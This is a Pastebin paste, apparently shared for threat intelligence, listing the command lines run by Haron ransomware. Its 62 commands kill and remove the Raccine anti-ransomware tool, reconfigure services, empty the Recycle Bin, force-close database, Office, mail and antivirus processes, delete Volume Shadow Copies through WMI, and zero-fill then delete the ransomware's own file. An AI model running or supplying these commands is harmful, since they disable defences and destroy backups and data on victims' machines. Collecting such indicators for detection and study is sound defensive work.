Advertisement
pandazheng

Haron Ransomware Command Lines

Jul 20th, 2021
288
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. "taskkill" /F /IM RaccineSettings.exe
  2. "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  3. "reg" delete HKCU\Software\Raccine /F
  4. "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  5. "sc.exe" config Dnscache start= auto
  6. "sc.exe" config SQLTELEMETRY start= disabled
  7. "sc.exe" config FDResPub start= auto
  8. "sc.exe" config SSDPSRV start= auto
  9. "sc.exe" config SQLWriter start= disabled
  10. "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  11. "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  12. "sc.exe" config upnphost start= auto
  13. "sc.exe" config SstpSvc start= disabled
  14. "taskkill.exe" /IM mspub.exe /F
  15. "taskkill.exe" /IM mydesktopqos.exe /F
  16. "taskkill.exe" /IM xfssvccon.exe /F
  17. "taskkill.exe" /IM CNTAoSMgr.exe /F
  18. "taskkill.exe" /IM sqlbrowser.exe /F
  19. "taskkill.exe" /IM mydesktopqos.exe /F
  20. "taskkill.exe" /IM visio.exe /F
  21. "taskkill.exe" /IM sqlwriter.exe /F
  22. "taskkill.exe" /IM mspub.exe /F
  23. "taskkill.exe" /IM sqlservr.exe /F
  24. "taskkill.exe" /IM mydesktopservice.exe /F
  25. "taskkill.exe" /IM synctime.exe /F
  26. "taskkill.exe" /IM tbirdconfig.exe /F
  27. "taskkill.exe" /IM mydesktopservice.exe /F
  28. "taskkill.exe" /IM Ntrtscan.exe /F
  29. "taskkill.exe" /IM mysqld.exe /F
  30. "taskkill.exe" /IM winword.exe /F
  31. "taskkill.exe" /IM isqlplussvc.exe /F
  32. "taskkill.exe" /IM thebat.exe /F
  33. "taskkill.exe" /IM dbeng50.exe /F
  34. "taskkill.exe" /IM onenote.exe /F
  35. "taskkill.exe" /IM thebat64.exe /F
  36. "taskkill.exe" /IM sqbcoreservice.exe /F
  37. "taskkill.exe" /IM steam.exe /F
  38. "taskkill.exe" /IM mysqld-nt.exe /F
  39. "taskkill.exe" /IM PccNTMon.exe /F
  40. "taskkill.exe" /IM encsvc.exe /F
  41. "taskkill.exe" /IM ocomm.exe /F
  42. "taskkill.exe" /IM firefoxconfig.exe /F
  43. "taskkill.exe" /IM wordpad.exe /F
  44. "taskkill.exe" /IM msaccess.exe /F
  45. "taskkill.exe" /IM agntsvc.exe /F
  46. "taskkill.exe" /IM mysqld-opt.exe /F
  47. "taskkill.exe" /IM excel.exe /F
  48. "taskkill.exe" /IM infopath.exe /F
  49. "taskkill.exe" /IM mbamtray.exe /F
  50. "taskkill.exe" /IM outlook.exe /F
  51. "taskkill.exe" /IM ocautoupds.exe /F
  52. "taskkill.exe" /IM zoolz.exe /F
  53. "taskkill.exe" /IM tmlisten.exe /F
  54. "taskkill.exe" /IM ocssd.exe /F
  55. "taskkill.exe" /IM ocssd.exe /F
  56. "taskkill.exe" /IM msftesql.exe /F
  57. "taskkill.exe" /IM oracle.exe /F
  58. "taskkill.exe" /IM oracle.exe /F
  59. "taskkill.exe" /IM powerpnt.exe /F
  60. "taskkill.exe" /IM sqlagent.exe /F
  61. "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  62. "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 �%s� & Del /f /q �%s�
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement